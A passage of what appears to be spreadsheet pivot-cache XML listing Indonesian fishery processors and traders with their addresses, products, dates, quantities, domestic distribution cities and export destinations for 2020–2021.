    <d v="2020-09-23T00:00:00"/>
    <n v="257690.4"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20912"/>
    <x v="257"/>
    <s v="PT. KELOLA MINA LAUT UNIT III"/>
    <s v="Jl. KIG Raya Selatan Kav C15 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21018"/>
    <x v="258"/>
    <s v="PT. SURYA ADIKUMALA ABADI"/>
    <s v="Jl. Raya Situbondo - Banyuwangi KM.17, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="507000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21019"/>
    <x v="258"/>
    <s v="PT. SURYA ADIKUMALA ABADI"/>
    <s v="Jl. Raya Situbondo - Banyuwangi KM.17, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="973000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21062"/>
    <x v="199"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Ir. Sutami Km 7, Kel. Kota Baru, Kec. Tanjung Karang Timur, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Berlapis Tepung Beku"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21091"/>
    <x v="259"/>
    <s v="PT. SULTRATUNA SAMUDRA"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-06-23T00:00:00"/>
    <n v="564000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21174"/>
    <x v="260"/>
    <s v="PT. SAMUDRA KENCANA MINA"/>
    <s v="Pergudangan Central Square Blok E 31, Jl. Ahmad Yani No.41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Lencam, Kuwe,Kerapu, Layur, Bawal, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="54000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21366"/>
    <x v="261"/>
    <s v="PT. KBT SEAFOOD INTERNATIONAL"/>
    <s v="Dusun Krajan I RT 001 RW 003, Desa Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-08-06T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20685"/>
    <x v="262"/>
    <s v="PT. PINGROUN FOOD JAKARTA"/>
    <s v="Kawasan Industri Lippo Cikarang Delta Silicon I Jl. Akasia I Kav A8 No.5A, Kel. Sukaresmi, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Sidat Panggang Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="27600"/>
    <s v="Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bandung, Kota Bekasi, Kota Surabaya, Kota Makassar"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="19554"/>
    <x v="263"/>
    <s v="PT. EXPRAVET NASUBA"/>
    <s v="Jl. K. L. Yos Sudarso KM 8,8 No.88, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Steak Ikan Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="19412"/>
    <x v="197"/>
    <s v="MARIJO 88"/>
    <s v="Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Abon Duri Bandeng"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Makassar, Kota Palopo, Kota Kendari"/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="20366"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="17177"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Lemadang, Marlin, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Lombok Barat"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="20572"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="20573"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="17174"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="17175"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="20154"/>
    <x v="198"/>
    <s v="CV. NOGO SEGORO"/>
    <s v="Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Kembung, Marlin, Cakalang)"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="20359"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="17267"/>
    <x v="264"/>
    <s v="PT. SURYA INTI ANEKA PANGAN"/>
    <s v="Jl. Yos Sudarso No.8 RT 04 RW 02, Kel. Bulang, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Udang"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Bandung, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="17268"/>
    <x v="264"/>
    <s v="PT. SURYA INTI ANEKA PANGAN"/>
    <s v="Jl. Yos Sudarso No.8 RT 04 RW 02, Kel. Bulang, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="1300000"/>
    <s v="Kota Bandung, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="20619"/>
    <x v="265"/>
    <s v="CV. PRIMA INVESTA NUSA TENGGARA"/>
    <s v="Jl. Pahlawan No.102, Kel. Nunbaun Sabu, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Beku (Tongkol, Tembang, Layang, Cakalang, Tenggiri, Lemadang, Marlin)"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="43500"/>
    <s v="Kota Surabaya"/>
    <s v="Timor-Leste"/>
  </r>
  <r>
    <n v="20620"/>
    <x v="265"/>
    <s v="CV. PRIMA INVESTA NUSA TENGGARA"/>
    <s v="Jl. Pahlawan No.102, Kel. Nunbaun Sabu, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Beku (Lencam, Maubara, Anggoli, Kerapu, Layur, Kakatua, Kakap, Kurisi)"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="141200"/>
    <s v="Kota Surabaya"/>
    <s v="Timor-Leste"/>
  </r>
  <r>
    <n v="20100"/>
    <x v="266"/>
    <s v="UD, BARAKAH"/>
    <s v="Kampung Nelayan Olio RT 16 RW 06, Kel, Merdeka, Kec, Kupang Timur, Kabupaten Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Udang Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Timor-Leste"/>
  </r>
  <r>
    <n v="20436"/>
    <x v="101"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Nila Utuh Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="234750"/>
    <m/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="20621"/>
    <x v="265"/>
    <s v="CV. PRIMA INVESTA NUSA TENGGARA"/>
    <s v="Jl. Pahlawan No.102, Kel. Nunbaun Sabu, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Udang Beku"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="2350"/>
    <m/>
    <s v="Timor-Leste"/>
  </r>
  <r>
    <n v="20622"/>
    <x v="265"/>
    <s v="CV. PRIMA INVESTA NUSA TENGGARA"/>
    <s v="Jl. Pahlawan No.102, Kel. Nunbaun Sabu, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Gurame, Mas, Patin, Bandeng, Nila)"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="Timor-Leste"/>
  </r>
  <r>
    <n v="21166"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Kerang Kering"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Philippines"/>
  </r>
  <r>
    <n v="21326"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="16300"/>
    <m/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="19356"/>
    <x v="267"/>
    <s v="CV. ANUGERAH ARTHA ABADI"/>
    <s v="Jl. Nambangan 09, Kel. Kenjeran, Kec. Tanah Kali Kedinding, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Kue Ikan, Pangsit Ikan) "/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Cilacap, Kabupaten Purbalingga, Kabupaten Kebumen, Kabupaten Purworejo, Kabupaten Klaten, Kabupaten Semarang, Kabupaten Tegal, Kota Yogyakarta, Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Jombang, Kabupaten Nganjuk, Kabupaten Madiun, Kabupaten Ngawi, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Tengah, Kota Banjarmasin, Kota Balikpapan, Kota Makassar, Kota Ternate"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="19749"/>
    <x v="268"/>
    <s v="PT. BERKAT SAMUDERA SUKSES"/>
    <s v="Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Sarden, Selar, Layang, Tenggiri)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19750"/>
    <x v="268"/>
    <s v="PT. BERKAT SAMUDERA SUKSES"/>
    <s v="Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Selar, Layang, Tenggiri)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19751"/>
    <x v="268"/>
    <s v="PT. BERKAT SAMUDERA SUKSES"/>
    <s v="Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Barramundi, Jahan, Manyung, Alu-alu, Kerapu, Lebam, Bawal, Kakap, Dingkis)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19752"/>
    <x v="268"/>
    <s v="PT. BERKAT SAMUDERA SUKSES"/>
    <s v="Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Manyung, Alu-alu, Kerapu, Lebam, Bawal, Kakap Merah, Kakap, Pari, Dingkis)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19753"/>
    <x v="268"/>
    <s v="PT. BERKAT SAMUDERA SUKSES"/>
    <s v="Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20140"/>
    <x v="269"/>
    <s v="KOPERASI PERIKANAN SANTO ALVIN PRATAMA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakatua, Kakap)"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Timur, Kota Surabaya, Kota Makassar"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19943"/>
    <x v="114"/>
    <s v="CV, ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl, Kapasa Raya No,38A, Kel, Kapasa, Kec, Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Deho, Layang, Cakalang)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20159"/>
    <x v="270"/>
    <s v="SUKIRMAN"/>
    <s v="Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kepiting Segar"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20161"/>
    <x v="270"/>
    <s v="SUKIRMAN"/>
    <s v="Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong)"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20407"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Siomay Ikan"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="308"/>
    <s v="Kabupaten Brebes, Kota Tegal"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="21349"/>
    <x v="272"/>
    <s v="CV. 88 AURORA"/>
    <s v="Jl. Raya By Pass BIL KM-15, Kel. Jonggat, Kec. Labulia, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Salmon Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Lombok Tengah"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="20322"/>
    <x v="226"/>
    <s v="PT. MEGA MANDIRI SURABAYA"/>
    <s v="Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Kerang Kering"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="200"/>
    <s v="Kabupaten Pidie Jaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="18853"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Segar (Kerapu)"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="0"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="21301"/>
    <x v="274"/>
    <s v="GETAS SUPER CAP TANI"/>
    <s v="Jl. Gudang Padi No. 20 RT. 006 RW. 003, Kel. Pasar Padi, Kec. Girimaya, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Getas Ikan, Getas Cumi-cumi"/>
    <d v="2020-07-28T00:00:00"/>
    <n v="16800"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19357"/>
    <x v="275"/>
    <s v="PT. CITRADIMENSI ARTHALI"/>
    <s v="Jl. Pulau Sulawesi Kawasan Industri Medan 1, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Roll Ikan"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="19368"/>
    <x v="275"/>
    <s v="PT. CITRADIMENSI ARTHALI"/>
    <s v="Jl. Pulau Sulawesi Kawasan Industri Medan 1, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Surimi Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="19556"/>
    <x v="114"/>
    <s v="CV. ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Deho, Layang, Cakalang)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="19558"/>
    <x v="114"/>
    <s v="CV, ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl, Kapasa Raya No,38A, Kel, Kapasa, Kec, Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Sri Lanka"/>
  </r>
  <r>
    <n v="19709"/>
    <x v="276"/>
    <s v="UD. ANDRE SEAFOOD"/>
    <s v="Jl. DR Soedjono Lingkar Selatan RT 003, Lingkungan Mapak Indah, Kel. Jempong Baru, Kec. Sekarbela, Kota Mataram&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Anggoli, Kerapu, Kakatua, Kakap)"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Pasuruan"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19791"/>
    <x v="276"/>
    <s v="UD. ANDRE SEAFOOD"/>
    <s v="Jl. DR Soedjono Lingkar Selatan RT 003, Lingkungan Mapak Indah, Kel. Jempong Baru, Kec. Sekarbela, Kota Mataram&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Kerang Segar"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Pasuruan"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="20259"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="20630"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="17102"/>
    <x v="278"/>
    <s v="PT. NEPTUNA DWINDO MATRINA"/>
    <s v="Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Deho, Selar, Layang, Tamban, Tenggiri)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Natuna"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="19600"/>
    <x v="279"/>
    <s v="SIDIQ RIZAL"/>
    <s v="Pundung Pedukuhan V RT 017 RW 009, Kel. Banaran, Kec. Galur, Kabupaten Kulon Progo&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Wader Crispy"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Yogyakarta"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="19938"/>
    <x v="280"/>
    <s v="CV. DZAKWANI FOOD"/>
    <s v="Jl. Cakalang RT 23 No.75, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Amplang Ikan"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="33600"/>
    <s v="Kota Balikpapan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="19939"/>
    <x v="280"/>
    <s v="CV. DZAKWANI FOOD"/>
    <s v="Jl. Cakalang RT 23 No.75, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Abon Kepiting"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="16800"/>
    <s v="Kota Balikpapan"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="21096"/>
    <x v="281"/>
    <s v="PT. BLAMBANGAN FOODPACKERS INDONESIA"/>
    <s v="Jl. Sampangan No. 1, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="482788"/>
    <s v="Kota Yogyakarta"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="21148"/>
    <x v="16"/>
    <s v="PT. LAURA INDO"/>
    <s v="Jl. Sabar Jaya No. 59, Kel. Prajen, Kec. Banyuasin, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Palembang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21171"/>
    <x v="282"/>
    <s v="CV. SATU WAHANA JAYA SENTOSA"/>
    <s v="Jl. Lobak No.109 C, Kel. Delima, Kec. Tampan, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Siomay Ikan, Siomay Udang, Batagor Ikan, Tekwan) "/>
    <d v="2020-06-17T00:00:00"/>
    <n v="276"/>
    <s v="Kota Pekanbaru"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="20433"/>
    <x v="101"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Nila Segar"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="33249"/>
    <s v="Kota Denpasar"/>
    <s v="Australia"/>
